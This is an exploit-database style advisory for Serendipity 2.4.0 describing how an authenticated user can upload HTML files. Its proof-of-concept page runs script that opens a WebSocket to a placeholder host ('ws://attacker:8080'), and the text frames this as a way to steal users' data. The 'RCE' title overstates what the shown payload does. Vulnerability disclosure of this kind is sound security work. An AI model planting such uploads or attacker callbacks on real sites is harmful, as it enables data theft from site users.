## Exploit Title: Serendipity 2.4.0 - File Inclusion RCE
## Author: nu11secur1ty
## Date: 04.26.2023
## Vendor: https://docs.s9y.org/index.html
## Software: https://github.com/s9y/Serendipity/releases/tag/2.4.0
## Reference: https://portswigger.net/web-security/file-upload
## Reference: https://portswigger.net/web-security/file-upload/lab-file-upload-remote-code-execution-via-web-shell-upload
## Description:
The already authenticated attacker can upload HTML files on the
server, which is absolutely dangerous and STUPID
In this file, the attacker can be codding a malicious web-socket
responder that can connect with some nasty webserver somewhere. It
depends on the scenario, the attacker can steal every day very
sensitive information, for a very long period of time, until the other
users will know that something is not ok with this system, and they
decide to stop using her, but maybe they will be too late for this
decision.
STATUS: HIGH Vulnerability
[+]Exploit:
```HTML
<!DOCTYPE html>
<html>
<head>
<meta charset="utf-8">
<title>NodeJS WebSocket Server</title>
</head>
<body>
<h1>You have just sent a message to your attacker,<br>
<h1>that you are already connected to him.</h1>
<script>
const ws = new WebSocket("ws://attacker:8080");
ws.addEventListener("open", () =>{
console.log("We are connected to you");
ws.send("How are you, dear :)?");
});
ws.addEventListener('message', function (event) {
console.log(event.data);
});
</script>
</body>
</html>
```
## Reproduce:
[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/s9y/2023/Serendipity-2.4.0)
## Proof and Exploit:
[href](https://streamable.com/2s80z6)
## Time spend:
01:27:00
--
System Administrator - Infrastructure Engineer
Penetration Testing Engineer
Exploit developer at https://packetstormsecurity.com/
https://cve.mitre.org/index.htmlhttps://cxsecurity.com/ and
https://www.exploit-db.com/
0day Exploit DataBase https://0day.today/
home page: https://www.nu11secur1ty.com/
hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E=nu11secur1ty <http://nu11secur1ty.com/>